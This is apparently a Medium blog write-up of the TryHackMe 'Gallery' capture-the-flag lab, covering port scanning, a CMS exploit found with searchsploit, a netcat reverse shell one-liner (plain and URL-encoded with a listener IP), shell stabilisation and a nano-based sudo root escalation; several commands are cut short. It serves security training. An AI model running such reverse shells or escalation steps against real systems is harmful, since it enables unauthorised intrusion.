TryHackMe: Gallery

Today we will take a look at TryHackMe: Gallery. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Question: How many ports are open?

Command: sudo nmap -sS -sC -sV -oN nmap/initial

Question: What’s the name of the CMS?

Answer: S***** I**** G******

I searched for a suitable exploit and found it

Let’s exploit.

Command: locate

Command: searchsploit -m /usr/share/exploitdb/exploits/php/webapps/

Command: python

Get Reverse Shell

Command: rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 4242 >/tmp/f

But first let’s encode

Command: rm%20-f%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.8.223.65%204242%20%3E%2Ftmp%2Ff%0A

Enter these commands after receiving the Reverse Shell

Command: script /dev/null -c bash

Command: export TERM=xterm

Command: ctrl+z

Command: stty raw -echo ; fg

Command: reset

Let’s enumerate the machine with

Here we found the necessary credentials credentials

Let’s change the user.

Command: su mike

Privilege Escalation

Let’s look at the file

Here we can use nano to get a shell. Let’s take a look at this

Command: sudo -u root /bin/bash /opt/

Command: read

Command: CTRL+R

Command: CTRL+X

Command: reset; sh 1>&0 2>&0

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Representing State in REST and GraphQL

Use Amazon CloudFront to serve a static website hosted on Amazon S3

Understanding AWS Lambda limits

N3 Ledger Integration Update

Demystifying Serverless Computing and FaaS

Guide to Digital Identity — Part 4 (Single Sign-on)

REST over gRPC with grpc-gateway for Go

5 Python Features for beginners: Should know

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "Welcome"

Hello, my name is Elman. I am from Azerbaijan. I wish you a good days

More from Medium

Daily Bugle — TryHackMe

TryHackMe: tmux Walkthrough

tmux logo at Tryhackme

Daily Bugle TryHackMe Write-Up

RootMe: TryHackMe: writeup:-